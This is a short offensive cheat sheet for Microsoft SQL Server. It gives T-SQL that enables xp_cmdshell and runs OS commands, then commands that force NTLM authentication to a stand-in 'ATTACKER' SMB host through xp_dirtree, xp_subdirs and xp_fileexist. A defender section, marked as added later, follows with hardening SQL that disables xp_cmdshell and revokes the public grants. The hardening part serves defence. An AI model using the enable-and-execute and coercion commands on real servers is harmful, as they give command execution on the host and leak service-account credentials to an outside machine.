Operator On The Wire

Extended Procedures

Use when xp_cmdshell is enabled or you can enable it as sysadmin.

Identify

SELECT name, value_in_use FROM sys.configurations WHERE name = 'xp_cmdshell';

Enable

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC xp_cmdshell 'whoami';  -- confirm the procedure now runs

Execute

EXEC xp_cmdshell 'whoami';
EXEC xp_cmdshell 'dir C:\';

NTLM Coercion

-- A rogue SMB server must be listening on ATTACKER before these run --
-- T-SQL string literals do not escape backslashes, so the UNC path uses single separators --

EXEC master..xp_dirtree '\\ATTACKER\share\ping';
EXEC master..xp_subdirs '\\ATTACKER\share\ping';
EXEC master..xp_fileexist '\\ATTACKER\share\ping';
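The defender-side counterpart to the checks above, added here and not part of the original page: T-SQL run in master as sysadmin that reports and disables xp_cmdshell, then lists and revokes the default public grants on the three UNC-capable extended procedures used for coercion. Object and column names are the documented catalog views; the only assumption is that the instance has not already customised these grants.

```sql
-- Added hardening example (not from the original page). Run in master as sysadmin.
USE master;

-- 1. Report the current state: value_in_use = 1 means xp_cmdshell is live.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'show advanced options');

-- 2. Disable xp_cmdshell and return 'show advanced options' to its default of 0,
--    since the enable sequence above leaves it set.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 3. Which principals may call the UNC-capable extended procedures?
--    Type 'X' = extended stored procedure; class 1 = object-level permission.
--    On a default install xp_dirtree, xp_subdirs and xp_fileexist are granted to public.
SELECT o.name           AS procedure_name,
       pr.name          AS grantee,
       pe.state_desc    AS grant_state,
       pe.permission_name
FROM sys.objects AS o
JOIN sys.database_permissions AS pe
     ON pe.class = 1 AND pe.major_id = o.object_id
JOIN sys.database_principals AS pr
     ON pr.principal_id = pe.grantee_principal_id
WHERE o.type = 'X'
  AND o.name IN ('xp_dirtree', 'xp_subdirs', 'xp_fileexist', 'xp_cmdshell')
ORDER BY o.name, pr.name;

-- 4. Remove the public grant so a low-privileged login (or an injected query)
--    can no longer make the service account authenticate to an arbitrary UNC path.
REVOKE EXECUTE ON OBJECT::sys.xp_dirtree  FROM public;
REVOKE EXECUTE ON OBJECT::sys.xp_subdirs  FROM public;
REVOKE EXECUTE ON OBJECT::sys.xp_fileexist FROM public;

-- Re-run step 3: the public rows for the three procedures should be gone.
```

SSMS file-browse dialogs call xp_dirtree under the connected login, so re-test any tooling that relies on them after revoking; a sysadmin is unaffected by the revoke.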